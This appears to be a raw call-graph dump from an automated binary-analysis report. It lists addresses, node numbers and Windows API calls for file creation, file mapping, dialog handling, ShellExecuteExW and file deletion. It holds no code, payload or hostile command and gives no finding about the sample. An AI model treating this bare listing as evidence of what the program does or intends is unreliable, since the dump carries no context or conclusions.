API calls 2 library calls 24132->24189 24190 a57625 26 API calls 2 library calls 24132->24190 24191 a3e27c 78 API calls 24132->24191 24133->24132 24136 a3e29e GetModuleHandleW FindResourceW 24137 a3da55 24136->24137 24137->23979 24139 a398ea 24138->24139 24140 a3994b CreateFileW 24139->24140 24141 a3996c GetLastError 24140->24141 24144 a399bb 24140->24144 24195 a3bb03 24141->24195 24143 a3998c 24143->24144 24145 a39990 CreateFileW GetLastError 24143->24145 24146 a399e5 SetFileTime 24144->24146 24148 a399ff 24144->24148 24145->24144 24147 a399b5 24145->24147 24146->24148 24147->24144 24148->24103 24150 a56349 24149->24150 24151 a5634d 24150->24151 24162 a56375 24150->24162 24199 a591a8 20 API calls __dosmaperr 24151->24199 24153 a56352 24200 a59087 26 API calls __cftof 24153->24200 24154 a56699 24156 a4fbbc CatchGuardHandler 5 API calls 24154->24156 24158 a566a6 24156->24158 24157 a5635d 24159 a4fbbc CatchGuardHandler 5 API calls 24157->24159 24158->24104 24161 a56369 24159->24161 24161->24104 24162->24154 24201 a56230 5 API calls CatchGuardHandler 24162->24201 24164 a39e92 24163->24164 24168 a39ea5 24163->24168 24166 a39eb0 24164->24166 24202 a36d5b 77 API calls 24164->24202 24166->24113 24167 a39eb8 SetFilePointer 24167->24166 24169 a39ed4 GetLastError 24167->24169 24168->24166 24168->24167 24169->24166 24170 a39ede 24169->24170 24170->24166 24203 a36d5b 77 API calls 24170->24203 24173 a395be 24172->24173 24178 a395cf 24172->24178 24174 a395d1 24173->24174 24175 a395ca 24173->24175 24173->24178 24209 a39620 24174->24209 24204 a3974e 24175->24204 24178->24136 24180 a39bdc 24179->24180 24183 a39be3 24179->24183 24180->24113 24182 a39785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24182->24183 24183->24180 24183->24182 24224 a36d1a 77 API calls 24183->24224 24184->24113 24185->24110 24186->24132 24187->24132 24188->24132 24189->24132 24190->24132 24191->24132 24192->24119 24193->24124 24194->24122 24196 a3bb10 _wcslen 24195->24196 24197 a3bb39 _wcslen 
24196->24197 24198 a3bbb8 GetCurrentDirectoryW 24196->24198 24197->24143 24198->24197 24199->24153 24200->24157 24201->24162 24202->24168 24203->24166 24205 a39781 24204->24205 24206 a39757 24204->24206 24205->24178 24206->24205 24215 a3a1e0 24206->24215 24210 a3964a 24209->24210 24211 a3962c 24209->24211 24212 a39669 24210->24212 24223 a36bd5 76 API calls 24210->24223 24211->24210 24213 a39638 CloseHandle 24211->24213 24212->24178 24213->24210 24216 a4ec50 24215->24216 24217 a3a1ed DeleteFileW 24216->24217 24218 a3a200 24217->24218 24219 a3977f 24217->24219 24220 a3bb03 GetCurrentDirectoryW 24218->24220 24219->24178 24221 a3a214 24220->24221 24221->24219 24222 a3a218 DeleteFileW 24221->24222 24222->24219 24223->24212 24224->24183 24227 a4eb3d ___std_exception_copy 24225->24227 24226 a490d6 24226->23753 24227->24226 24230 a4eb59 24227->24230 24234 a57a5e 7 API calls 2 library calls 24227->24234 24229 a4f5c9 24236 a5238d RaiseException 24229->24236 24230->24229 24235 a5238d RaiseException 24230->24235 24233 a4f5e6 24234->24227 24235->24229 24236->24233 24238 a57ce1 _unexpected 24237->24238 24239 a57ce8 24238->24239 24240 a57cfa 24238->24240 24273 a57e2f GetModuleHandleW 24239->24273 24261 a5ac31 EnterCriticalSection 24240->24261 24243 a57ced 24243->24240 24274 a57e73 GetModuleHandleExW 24243->24274 24246 a57d76 24251 a57d8e 24246->24251 24255 a58a91 _abort 5 API calls 24246->24255 24249 a57dbc 24265 a57dee 24249->24265 24250 a57de8 24283 a62390 5 API calls CatchGuardHandler 24250->24283 24256 a58a91 _abort 5 API calls 24251->24256 24255->24251 24259 a57d9f 24256->24259 24257 a57d01 24257->24246 24257->24259 24282 a587e0 20 API calls _abort 24257->24282 24262 a57ddf 24259->24262 24261->24257 24284 a5ac81 LeaveCriticalSection 24262->24284 24264 a57db8 24264->24249 24264->24250 24285 a5b076 24265->24285 24268 a57e1c 24271 a57e73 _abort 8 API calls 24268->24271 24269 a57dfc GetPEB 24269->24268 24270 a57e0c GetCurrentProcess TerminateProcess 24269->24270 24270->24268 
24272 a57e24 ExitProcess 24271->24272 24273->24243 24275 a57ec0 24274->24275 24276 a57e9d GetProcAddress 24274->24276 24278 a57ec6 FreeLibrary 24275->24278 24279 a57ecf 24275->24279 24277 a57eb2 24276->24277 24277->24275 24278->24279 24280 a4fbbc CatchGuardHandler 5 API calls 24279->24280 24281 a57cf9 24280->24281 24281->24240 24282->24246 24284->24264 24286 a5b091 24285->24286 24287 a5b09b 24285->24287 24289 a4fbbc CatchGuardHandler 5 API calls 24286->24289 24288 a5ac98 __dosmaperr 5 API calls 24287->24288 24288->24286 24290 a57df8 24289->24290 24290->24268 24290->24269 25426 a41bbd GetCPInfo IsDBCSLeadByte 25408 a4c793 102 API calls 4 library calls 25386 a49580 6 API calls 25387 a4b18d 78 API calls 25353 a4c793 97 API calls 4 library calls 25355 a5b49d 6 API calls CatchGuardHandler 24308 a313e1 84 API calls 2 library calls 24309 a4eae7 24310 a4eaf1 24309->24310 24311 a4e85d ___delayLoadHelper2@8 14 API calls 24310->24311 24312 a4eafe 24311->24312 25356 a4f4e7 29 API calls _abort 24313 a4b7e0 24314 a4b7ea __EH_prolog 24313->24314 24481 a31316 24314->24481 24317 a4bf0f 24546 a4d69e 24317->24546 24318 a4b82a 24320 a4b838 24318->24320 24321 a4b89b 24318->24321 24393 a4b841 24318->24393 24324 a4b83c 24320->24324 24325 a4b878 24320->24325 24323 a4b92e GetDlgItemTextW 24321->24323 24328 a4b8b1 24321->24328 24323->24325 24331 a4b96b 24323->24331 24335 a3e617 53 API calls 24324->24335 24324->24393 24332 a4b95f KiUserCallbackDispatcher 24325->24332 24325->24393 24326 a4bf38 24329 a4bf41 SendDlgItemMessageW 24326->24329 24330 a4bf52 GetDlgItem SendMessageW 24326->24330 24327 a4bf2a SendMessageW 24327->24326 24334 a3e617 53 API calls 24328->24334 24329->24330 24564 a4a64d GetCurrentDirectoryW 24330->24564 24333 a4b980 GetDlgItem 24331->24333 24479 a4b974 24331->24479 24332->24393 24337 a4b994 SendMessageW SendMessageW 24333->24337 24338 a4b9b7 SetFocus 24333->24338 24339 a4b8ce SetDlgItemTextW 24334->24339 24340 a4b85b 24335->24340 24337->24338 24342 a4b9c7 24338->24342 
24358 a4b9e0 24338->24358 24343 a4b8d9 24339->24343 24586 a3124f SHGetMalloc 24340->24586 24341 a4bf82 GetDlgItem 24345 a4bfa5 SetWindowTextW 24341->24345 24346 a4bf9f 24341->24346 24348 a3e617 53 API calls 24342->24348 24351 a4b8e6 GetMessageW 24343->24351 24343->24393 24565 a4abab GetClassNameW 24345->24565 24346->24345 24352 a4b9d1 24348->24352 24349 a4be55 24353 a3e617 53 API calls 24349->24353 24356 a4b8fd IsDialogMessageW 24351->24356 24351->24393 24587 a4d4d4 24352->24587 24354 a4be65 SetDlgItemTextW 24353->24354 24360 a4be79 24354->24360 24356->24343 24362 a4b90c TranslateMessage DispatchMessageW 24356->24362 24363 a3e617 53 API calls 24358->24363 24359 a4c1fc SetDlgItemTextW 24359->24393 24365 a3e617 53 API calls 24360->24365 24362->24343 24364 a4ba17 24363->24364 24367 a34092 _swprintf 51 API calls 24364->24367 24401 a4be9c _wcslen 24365->24401 24366 a4bff0 24370 a4c020 24366->24370 24373 a3e617 53 API calls 24366->24373 24372 a4ba29 24367->24372 24368 a4c73f 97 API calls 24368->24366 24369 a4b9d9 24491 a3a0b1 24369->24491 24375 a4c73f 97 API calls 24370->24375 24424 a4c0d8 24370->24424 24376 a4d4d4 16 API calls 24372->24376 24378 a4c003 SetDlgItemTextW 24373->24378 24381 a4c03b 24375->24381 24376->24369 24377 a4c18b 24382 a4c194 EnableWindow 24377->24382 24383 a4c19d 24377->24383 24385 a3e617 53 API calls 24378->24385 24379 a4ba68 GetLastError 24380 a4ba73 24379->24380 24497 a4ac04 SetCurrentDirectoryW 24380->24497 24394 a4c04d 24381->24394 24421 a4c072 24381->24421 24382->24383 24389 a4c1ba 24383->24389 24605 a312d3 GetDlgItem EnableWindow 24383->24605 24384 a4beed 24388 a3e617 53 API calls 24384->24388 24390 a4c017 SetDlgItemTextW 24385->24390 24387 a4ba87 24391 a4ba90 GetLastError 24387->24391 24392 a4ba9e 24387->24392 24388->24393 24397 a4c1e1 24389->24397 24406 a4c1d9 SendMessageW 24389->24406 24390->24370 24391->24392 24403 a4bb20 24392->24403 24407 a4baae GetTickCount 24392->24407 24454 a4bb11 24392->24454 24603 a49ed5 32 API calls 24394->24603 
24395 a4c0cb 24398 a4c73f 97 API calls 24395->24398 24397->24393 24408 a3e617 53 API calls 24397->24408 24398->24424 24400 a4c1b0 24606 a312d3 GetDlgItem EnableWindow 24400->24606 24401->24384 24409 a3e617 53 API calls 24401->24409 24402 a4bd56 24506 a312f1 GetDlgItem ShowWindow 24402->24506 24410 a4bcfb 24403->24410 24412 a4bcf1 24403->24412 24413 a4bb39 GetModuleFileNameW 24403->24413 24404 a4c066 24404->24421 24406->24397 24415 a34092 _swprintf 51 API calls 24407->24415 24416 a4b862 24408->24416 24417 a4bed0 24409->24417 24420 a3e617 53 API calls 24410->24420 24411 a4c169 24604 a49ed5 32 API calls 24411->24604 24412->24325 24412->24410 24597 a3f28c 82 API calls 24413->24597 24423 a4bac7 24415->24423 24416->24359 24416->24393 24425 a34092 _swprintf 51 API calls 24417->24425 24428 a4bd05 24420->24428 24421->24395 24429 a4c73f 97 API calls 24421->24429 24422 a4bd66 24507 a312f1 GetDlgItem ShowWindow 24422->24507 24498 a3966e 24423->24498 24424->24377 24424->24411 24431 a3e617 53 API calls 24424->24431 24425->24384 24426 a4c188 24426->24377 24427 a4bb5f 24432 a34092 _swprintf 51 API calls 24427->24432 24433 a34092 _swprintf 51 API calls 24428->24433 24434 a4c0a0 24429->24434 24431->24424 24436 a4bb81 CreateFileMappingW 24432->24436 24437 a4bd23 24433->24437 24434->24395 24438 a4c0a9 DialogBoxParamW 24434->24438 24435 a4bd70 24439 a3e617 53 API calls 24435->24439 24441 a4bc60 __InternalCxxFrameHandler 24436->24441 24442 a4bbe3 GetCommandLineW 24436->24442 24450 a3e617 53 API calls 24437->24450 24438->24325 24438->24395 24443 a4bd7a SetDlgItemTextW 24439->24443 24446 a4bc6b ShellExecuteExW 24441->24446 24445 a4bbf4 24442->24445 24508 a312f1 GetDlgItem ShowWindow 24443->24508 24444 a4baed 24448 a4baf4 GetLastError 24444->24448 24452 a4baff 24444->24452 24598 a4b425 SHGetMalloc 24445->24598 24465 a4bc88 24446->24465 24448->24452 24456 a4bd3d 24450->24456 24451 a4bd8c SetDlgItemTextW GetDlgItem 24457 a4bdc1 24451->24457 24458 a4bda9 GetWindowLongW SetWindowLongW 
24451->24458 24453 a3959a 80 API calls 24452->24453 24453->24454 24454->24402 24454->24403 24455 a4bc10 24599 a4b425 SHGetMalloc 24455->24599 24509 a4c73f 24457->24509 24458->24457 24461 a4bc1c 24600 a4b425 SHGetMalloc 24461->24600 24464 a4bccb 24464->24412 24470 a4bce1 UnmapViewOfFile CloseHandle 24464->24470 24465->24464 24474 a4bcb7 Sleep 24465->24474 24466 a4c73f 97 API calls 24467 a4bddd 24466->24467 24534 a4da52 24467->24534 24468 a4bc28 24601 a3f3fa 82 API calls 2 library calls 24468->24601 24470->24412 24473 a4bc3f MapViewOfFile 24473->24441 24474->24464 24474->24465 24475 a4c73f 97 API calls 24478 a4be03 24475->24478 24476 a4be2c 24602 a312d3 GetDlgItem EnableWindow 24476->24602 24478->24476 24480 a4c73f 97 API calls 24478->24480 24479->24325 24479->24349 24480->24476 24482 a31378 24481->24482 24483 a3131f 24481->24483 24608 a3e2c1 GetWindowLongW SetWindowLongW 24482->24608 24484 a31385 24483->24484 24607 a3e2e8 62 API calls 2 library calls 24483->24607 24484->24317 24484->24318 24484->24393 24487 a31341 24487->24484 24488 a31354 GetDlgItem 24487->24488 24488->24484 24489 a31364 24488->24489 24489->24484 24490 a3136a SetWindowTextW 24489->24490 24490->24484 24494 a3a0bb 24491->24494 24492 a3a14c 24493 a3a2b2 8 API calls 24492->24493 24495 a3a175 24492->24495 24493->24495 24494->24492 24494->24495 24609 a3a2b2 24494->24609 24495->24379 24495->24380 24497->24387 24499 a39678 24498->24499 24500 a396d5 CreateFileW 24499->24500 24501 a396c9 24499->24501 24500->24501 24502 a3971f 24501->24502 24503 a3bb03 GetCurrentDirectoryW 24501->24503 24502->24444 24504 a39704 24503->24504 24504->24502 24505 a39708 CreateFileW 24504->24505 24505->24502 24506->24422 24507->24435 24508->24451 24510 a4c749 __EH_prolog 24509->24510 24511 a4bdcf 24510->24511 24641 a4b314 24510->24641 24511->24466 24514 a4b314 ExpandEnvironmentStringsW 24521 a4c780 _wcslen _wcsrchr 24514->24521 24515 a4ca67 SetWindowTextW 24515->24521 24520 a4c855 SetFileAttributesW 24522 a4c90f GetFileAttributesW 
24520->24522 24523 a4c86f __cftof _wcslen 24520->24523 24521->24511 24521->24514 24521->24515 24521->24520 24527 a4cc31 GetDlgItem SetWindowTextW SendMessageW 24521->24527 24530 a4cc71 SendMessageW 24521->24530 24645 a41fbb CompareStringW 24521->24645 24646 a4a64d GetCurrentDirectoryW 24521->24646 24648 a3a5d1 6 API calls 24521->24648 24649 a3a55a FindClose 24521->24649 24650 a4b48e 76 API calls 2 library calls 24521->24650 24651 a53e3e 24521->24651 24522->24521 24525 a4c921 DeleteFileW 24522->24525 24523->24521 24523->24522 24647 a3b991 51 API calls 2 library calls 24523->24647 24525->24521 24528 a4c932 24525->24528 24527->24521 24529 a34092 _swprintf 51 API calls 24528->24529 24531 a4c952 GetFileAttributesW 24529->24531 24530->24521 24531->24528 24532 a4c967 MoveFileW 24531->24532 24532->24521 24533 a4c97f MoveFileExW 24532->24533 24533->24521 24535 a4da5c __EH_prolog 24534->24535 24666 a40659 24535->24666 24537 a4da8d 24670 a35b3d 24537->24670 24539 a4daab 24674 a37b0d 24539->24674 24543 a4dafe 24690 a37b9e 24543->24690 24545 a4bdee 24545->24475 24547 a4d6a8 24546->24547 24548 a4a5c6 4 API calls 24547->24548 24549 a4d6ad 24548->24549 24550 a4d6b5 GetWindow 24549->24550 24551 a4bf15 24549->24551 24550->24551 24556 a4d6d5 24550->24556 24551->24326 24551->24327 24552 a4d6e2 GetClassNameW 25175 a41fbb CompareStringW 24552->25175 24554 a4d706 GetWindowLongW 24555 a4d76a GetWindow 24554->24555 24557 a4d716 SendMessageW 24554->24557 24555->24551 24555->24556 24556->24551 24556->24552 24556->24554 24556->24555 24557->24555 24558 a4d72c GetObjectW 24557->24558 25176 a4a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24558->25176 24560 a4d743 25177 a4a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24560->25177 25178 a4a80c 8 API calls 24560->25178 24563 a4d754 SendMessageW DeleteObject 24563->24555 24564->24341 24566 a4abf1 24565->24566 24567 a4abcc 24565->24567 24569 a4abf6 SHAutoComplete 24566->24569 24570 a4abff 24566->24570 25179 a41fbb CompareStringW 24567->25179 
24569->24570 24573 a4b093 24570->24573 24571 a4abdf 24571->24566 24572 a4abe3 FindWindowExW 24571->24572 24572->24566 24574 a4b09d __EH_prolog 24573->24574 24575 a313dc 84 API calls 24574->24575 24576 a4b0bf 24575->24576 25180 a31fdc 24576->25180 24579 a4b0d9 24581 a31692 86 API calls 24579->24581 24580 a4b0eb 24582 a319af 128 API calls 24580->24582 24583 a4b0e4 24581->24583 24585 a4b10d __InternalCxxFrameHandler ___std_exception_copy 24582->24585 24583->24366 24583->24368 24584 a31692 86 API calls 24584->24583 24585->24584 24586->24416 25188 a4b568 PeekMessageW 24587->25188 24590 a4d536 SendMessageW SendMessageW 24592 a4d591 SendMessageW SendMessageW SendMessageW 24590->24592 24593 a4d572 24590->24593 24591 a4d502 24596 a4d50d ShowWindow SendMessageW SendMessageW 24591->24596 24594 a4d5c4 SendMessageW 24592->24594 24595 a4d5e7 SendMessageW 24592->24595 24593->24592 24594->24595 24595->24369 24596->24590 24597->24427 24598->24455 24599->24461 24600->24468 24601->24473 24602->24479 24603->24404 24604->24426 24605->24400 24606->24389 24607->24487 24608->24484 24610 a3a2bf 24609->24610 24611 a3a2e3 24610->24611 24612 a3a2d6 CreateDirectoryW 24610->24612 24630 a3a231 24611->24630 24612->24611 24614 a3a316 24612->24614 24617 a3a325 24614->24617 24622 a3a4ed 24614->24622 24616 a3a329 GetLastError 24616->24617 24617->24494 24618 a3bb03 GetCurrentDirectoryW 24620 a3a2ff 24618->24620 24620->24616 24621 a3a303 CreateDirectoryW 24620->24621 24621->24614 24621->24616 24623 a4ec50 24622->24623 24624 a3a4fa SetFileAttributesW 24623->24624 24625 a3a510 24624->24625 24626 a3a53d 24624->24626 24627 a3bb03 GetCurrentDirectoryW 24625->24627 24626->24617 24628 a3a524 24627->24628 24628->24626 24629 a3a528 SetFileAttributesW 24628->24629 24629->24626 24633 a3a243 24630->24633 24634 a4ec50 24633->24634 24635 a3a250 GetFileAttributesW 24634->24635 24636 a3a261 24635->24636 24637 a3a23a 24635->24637 24638 a3bb03 GetCurrentDirectoryW 24636->24638 24637->24616 24637->24618 24639 a3a275 
24638->24639 24639->24637 24640 a3a279 GetFileAttributesW 24639->24640 24640->24637 24642 a4b31e 24641->24642 24643 a4b40d 24642->24643 24644 a4b3f0 ExpandEnvironmentStringsW 24642->24644 24643->24521 24644->24643 24645->24521 24646->24521 24647->24523 24648->24521 24649->24521 24650->24521 24652 a58e54 24651->24652 24653 a58e61 24652->24653 24654 a58e6c 24652->24654 24655 a58e06 __vsnwprintf_l 21 API calls 24653->24655 24656 a58e74 24654->24656 24662 a58e7d __dosmaperr 24654->24662 24660 a58e69 24655->24660 24657 a58dcc _free 20 API calls 24656->24657 24657->24660 24658 a58ea7 HeapReAlloc 24658->24660 24658->24662 24659 a58e82 24664 a591a8 20 API calls __dosmaperr 24659->24664 24660->24521 24662->24658 24662->24659 24665 a57a5e 7 API calls 2 library calls 24662->24665 24664->24660 24665->24662 24667 a40666 _wcslen 24666->24667 24694 a317e9 24667->24694 24669 a4067e 24669->24537 24671 a40659 _wcslen 24670->24671 24672 a317e9 78 API calls 24671->24672 24673 a4067e 24672->24673 24673->24539 24675 a37b17 __EH_prolog 24674->24675 24711 a3ce40 24675->24711 24677 a37b32 24678 a4eb38 8 API calls 24677->24678 24679 a37b5c 24678->24679 24717 a44a76 24679->24717 24682 a37c7d 24683 a37c87 24682->24683 24685 a37cf1 24683->24685 24746 a3a56d 24683->24746 24687 a37d50 24685->24687 24724 a38284 24685->24724 24686 a37d92 24686->24543 24687->24686 24752 a3138b 74 API calls 24687->24752 24691 a37bac 24690->24691 24693 a37bb3 24690->24693 24692 a42297 86 API calls 24691->24692 24692->24693 24695 a317ff 24694->24695 24705 a3185a __InternalCxxFrameHandler 24694->24705 24696 a31828 24695->24696 24707 a36c36 76 API calls __vswprintf_c_l 24695->24707 24698 a31887 24696->24698 24703 a31847 ___std_exception_copy 24696->24703 24700 a53e3e 22 API calls 24698->24700 24699 a3181e 24708 a36ca7 75 API calls 24699->24708 24702 a3188e 24700->24702 24702->24705 24710 a36ca7 75 API calls 24702->24710 24703->24705 24709 a36ca7 75 API calls 24703->24709 24705->24669 24707->24699 24708->24696 
24709->24705 24710->24705 24712 a3ce4a __EH_prolog 24711->24712 24713 a4eb38 8 API calls 24712->24713 24714 a3ce8d 24713->24714 24715 a4eb38 8 API calls 24714->24715 24716 a3ceb1 24715->24716 24716->24677 24718 a44a80 __EH_prolog 24717->24718 24719 a4eb38 8 API calls 24718->24719 24721 a44a9c 24719->24721 24720 a37b8b 24720->24682 24721->24720 24723 a40e46 80 API calls 24721->24723 24723->24720 24725 a3828e __EH_prolog 24724->24725 24753 a313dc 24725->24753 24727 a382aa 24728 a382bb 24727->24728 24896 a39f42 24727->24896 24731 a382f2 24728->24731 24761 a31a04 24728->24761 24892 a31692 24731->24892 24734 a38389 24780 a38430 24734->24780 24737 a383e8 24788 a31f6d 24737->24788 24741 a382ee 24741->24731 24741->24734 24743 a3a56d 7 API calls 24741->24743 24900 a3c0c5 CompareStringW _wcslen 24741->24900 24742 a383f3 24742->24731 24792 a33b2d 24742->24792 24804 a3848e 24742->24804 24743->24741 24747 a3a582 24746->24747 24751 a3a5b0 24747->24751 25164 a3a69b 24747->25164 24749 a3a592 24750 a3a597 FindClose 24749->24750 24749->24751 24750->24751 24751->24683 24752->24686 24754 a313e1 __EH_prolog 24753->24754 24755 a3ce40 8 API calls 24754->24755 24756 a31419 24755->24756 24757 a4eb38 8 API calls 24756->24757 24759 a31474 __cftof 24756->24759 24758 a31461 24757->24758 24758->24759 24901 a3b505 24758->24901 24759->24727 24762 a31a0e __EH_prolog 24761->24762 24774 a31a61 24762->24774 24777 a31b9b 24762->24777 24917 a313ba 24762->24917 24764 a31bc7 24920 a3138b 74 API calls 24764->24920 24767 a33b2d 101 API calls 24771 a31c12 24767->24771 24768 a31bd4 24768->24767 24768->24777 24769 a31c5a 24773 a31c8d 24769->24773 24769->24777 24921 a3138b 74 API calls 24769->24921 24771->24769 24772 a33b2d 101 API calls 24771->24772 24772->24771 24773->24777 24778 a39e80 79 API calls 24773->24778 24774->24764 24774->24768 24774->24777 24775 a33b2d 101 API calls 24776 a31cde 24775->24776 24776->24775 24776->24777 24777->24741 24778->24776 24779 a39e80 79 API calls 24779->24774 24939 a3cf3d 
24780->24939 24782 a38440 24943 a413d2 GetSystemTime SystemTimeToFileTime 24782->24943 24784 a383a3 24784->24737 24785 a41b66 24784->24785 24948 a4de6b 24785->24948 24789 a31f72 __EH_prolog 24788->24789 24791 a31fa6 24789->24791 24956 a319af 24789->24956 24791->24742 24793 a33b39 24792->24793 24794 a33b3d 24792->24794 24793->24742 24803 a39e80 79 API calls 24794->24803 24795 a33b4f 24796 a33b6a 24795->24796 24797 a33b78 24795->24797 24798 a33baa 24796->24798 25086 a332f7 89 API calls 2 library calls 24796->25086 25087 a3286b 101 API calls 3 library calls 24797->25087 24798->24742 24801 a33b76 24801->24798 25088 a320d7 74 API calls 24801->25088 24803->24795 24805 a38498 __EH_prolog 24804->24805 24808 a384d5 24805->24808 24819 a38513 24805->24819 25113 a48c8d 103 API calls 24805->25113 24807 a384f5 24809 a384fa 24807->24809 24810 a3851c 24807->24810 24808->24807 24813 a3857a 24808->24813 24808->24819 24809->24819 25114 a37a0d 152 API calls 24809->25114 24810->24819 25115 a48c8d 103 API calls 24810->25115 24813->24819 25089 a35d1a 24813->25089 24815 a38605 24815->24819 25095 a38167 24815->25095 24818 a38797 24820 a3a56d 7 API calls 24818->24820 24821 a38802 24818->24821 24819->24742 24820->24821 25101 a37c0d 24821->25101 24823 a3d051 82 API calls 24829 a3885d 24823->24829 24824 a38a5f 24830 a38ab6 24824->24830 24843 a38a6a 24824->24843 24825 a38992 24825->24824 24832 a389e1 24825->24832 24826 a3898b 25118 a32021 74 API calls 24826->25118 24829->24819 24829->24823 24829->24825 24829->24826 25116 a38117 84 API calls 24829->25116 25117 a32021 74 API calls 24829->25117 24836 a38a4c 24830->24836 25121 a37fc0 97 API calls 24830->25121 24831 a38ab4 24837 a3959a 80 API calls 24831->24837 24834 a38b14 24832->24834 24832->24836 24838 a3a231 3 API calls 24832->24838 24833 a39105 24835 a3959a 80 API calls 24833->24835 24834->24833 24852 a38b82 24834->24852 25122 a398bc 24834->25122 24835->24819 24836->24831 24836->24834 24837->24819 24840 a38a19 24838->24840 24840->24836 25119 
a392a3 97 API calls 24840->25119 24841 a3ab1a 8 API calls 24844 a38bd1 24841->24844 24843->24831 25120 a37db2 101 API calls 24843->25120 24847 a3ab1a 8 API calls 24844->24847 24864 a38be7 24847->24864 24850 a38b70 25126 a36e98 77 API calls 24850->25126 24852->24841 24853 a38cbc 24854 a38e40 24853->24854 24855 a38d18 24853->24855 24857 a38e52 24854->24857 24858 a38e66 24854->24858 24878 a38d49 24854->24878 24856 a38d8a 24855->24856 24859 a38d28 24855->24859 24866 a38167 19 API calls 24856->24866 24860 a39215 123 API calls 24857->24860 24861 a43377 75 API calls 24858->24861 24862 a38d6e 24859->24862 24870 a38d37 24859->24870 24860->24878 24863 a38e7f 24861->24863 24862->24878 25129 a377b8 111 API calls 24862->25129 25132 a43020 123 API calls 24863->25132 24864->24853 24865 a38c93 24864->24865 24873 a3981a 79 API calls 24864->24873 24865->24853 25127 a39a3c 82 API calls 24865->25127 24871 a38dbd 24866->24871 25128 a32021 74 API calls 24870->25128 24874 a38de6 24871->24874 24875 a38df5 24871->24875 24871->24878 24873->24865 25130 a37542 85 API calls 24874->25130 25131 a39155 93 API calls __EH_prolog 24875->25131 24881 a38f85 24878->24881 25133 a32021 74 API calls 24878->25133 24880 a39090 24880->24833 24883 a3a4ed 3 API calls 24880->24883 24881->24833 24881->24880 24882 a3903e 24881->24882 25107 a39f09 SetEndOfFile 24881->25107 25108 a39da2 24882->25108 24884 a390eb 24883->24884 24884->24833 25134 a32021 74 API calls 24884->25134 24887 a39085 24888 a39620 77 API calls 24887->24888 24888->24880 24890 a390fb 25135 a36dcb 76 API calls 24890->25135 24893 a316a4 24892->24893 25151 a3cee1 24893->25151 24897 a39f59 24896->24897 24898 a39f63 24897->24898 25163 a36d0c 78 API calls 24897->25163 24898->24728 24900->24741 24902 a3b50f __EH_prolog 24901->24902 24907 a3f1d0 82 API calls 24902->24907 24904 a3b521 24908 a3b61e 24904->24908 24907->24904 24909 a3b630 __cftof 24908->24909 24912 a410dc 24909->24912 24915 a4109e GetCurrentProcess GetProcessAffinityMask 24912->24915 24916 
a3b597 24915->24916 24916->24759 24922 a31732 24917->24922 24919 a313d6 24919->24779 24920->24777 24921->24773 24923 a317a0 __InternalCxxFrameHandler 24922->24923 24924 a31748 24922->24924 24923->24919 24925 a31771 24924->24925 24935 a36c36 76 API calls __vswprintf_c_l 24924->24935 24927 a317c7 24925->24927 24932 a3178d ___std_exception_copy 24925->24932 24929 a53e3e 22 API calls 24927->24929 24928 a31767 24936 a36ca7 75 API calls 24928->24936 24931 a317ce 24929->24931 24931->24923 24938 a36ca7 75 API calls 24931->24938 24932->24923 24937 a36ca7 75 API calls 24932->24937 24935->24928 24936->24925 24937->24923 24938->24923 24940 a3cf4d 24939->24940 24942 a3cf54 24939->24942 24944 a3981a 24940->24944 24942->24782 24943->24784 24945 a39833 24944->24945 24947 a39e80 79 API calls 24945->24947 24946 a39865 24946->24942 24947->24946 24949 a4de78 24948->24949 24950 a3e617 53 API calls 24949->24950 24951 a4de9b 24950->24951 24952 a34092 _swprintf 51 API calls 24951->24952 24953 a4dead 24952->24953 24954 a4d4d4 16 API calls 24953->24954 24955 a41b7c 24954->24955 24955->24737 24957 a319bf 24956->24957 24959 a319bb 24956->24959 24960 a318f6 24957->24960 24959->24791 24961 a31908 24960->24961 24962 a31945 24960->24962 24963 a33b2d 101 API calls 24961->24963 24968 a33fa3 24962->24968 24966 a31928 24963->24966 24966->24959 24971 a33fac 24968->24971 24969 a33b2d 101 API calls 24969->24971 24971->24969 24972 a31966 24971->24972 24985 a40e08 24971->24985 24972->24966 24973 a31e50 24972->24973 24974 a31e5a __EH_prolog 24973->24974 24993 a33bba 24974->24993 24976 a31e84 24977 a31732 78 API calls 24976->24977 24980 a31f0b 24976->24980 24978 a31e9b 24977->24978 25021 a318a9 78 API calls 24978->25021 24980->24966 24981 a31eb3 24983 a31ebf _wcslen 24981->24983 25022 a41b84 MultiByteToWideChar 24981->25022 25023 a318a9 78 API calls 24983->25023 24986 a40e0f 24985->24986 24988 a40e2a 24986->24988 24991 a36c31 RaiseException _com_raise_error 24986->24991 24989 a40e3b SetThreadExecutionState 
24988->24989 24992 a36c31 RaiseException _com_raise_error 24988->24992 24989->24971 24991->24988 24992->24989 24994 a33bc4 __EH_prolog 24993->24994 24995 a33bf6 24994->24995 24996 a33bda 24994->24996 24998 a33e51 24995->24998 25000 a33c22 24995->25000 25049 a3138b 74 API calls 24996->25049 25066 a3138b 74 API calls 24998->25066 25013 a33be5 25000->25013 25024 a43377 25000->25024 25002 a33ca3 25003 a33d2e 25002->25003 25020 a33c9a 25002->25020 25052 a3d051 25002->25052 25034 a3ab1a 25003->25034 25004 a33c9f 25004->25002 25051 a320bd 78 API calls 25004->25051 25006 a33c71 25006->25002 25006->25004 25007 a33c8f 25006->25007 25050 a3138b 74 API calls 25007->25050 25011 a33d41 25014 a33dd7 25011->25014 25015 a33dc7 25011->25015 25013->24976 25058 a43020 123 API calls 25014->25058 25038 a39215 25015->25038 25018 a33dd5 25018->25020 25059 a32021 74 API calls 25018->25059 25060 a42297 25020->25060 25021->24981 25022->24983 25023->24980 25025 a4338c 25024->25025 25026 a43396 ___std_exception_copy 25024->25026 25067 a36ca7 75 API calls 25025->25067 25028 a4341c 25026->25028 25029 a434c6 25026->25029 25033 a43440 __cftof 25026->25033 25068 a432aa 75 API calls 3 library calls 25028->25068 25069 a5238d RaiseException 25029->25069 25032 a434f2 25033->25006 25035 a3ab28 25034->25035 25037 a3ab32 25034->25037 25036 a4eb38 8 API calls 25035->25036 25036->25037 25037->25011 25039 a3921f __EH_prolog 25038->25039 25070 a37c64 25039->25070 25042 a313ba 78 API calls 25043 a39231 25042->25043 25073 a3d114 25043->25073 25046 a3d114 118 API calls 25047 a39243 25046->25047 25047->25046 25048 a3928a 25047->25048 25082 a3d300 97 API calls __InternalCxxFrameHandler 25047->25082 25048->25018 25049->25013 25050->25020 25051->25002 25053 a3d072 25052->25053 25054 a3d084 25052->25054 25083 a3603a 82 API calls 25053->25083 25084 a3603a 82 API calls 25054->25084 25057 a3d07c 25057->25003 25058->25018 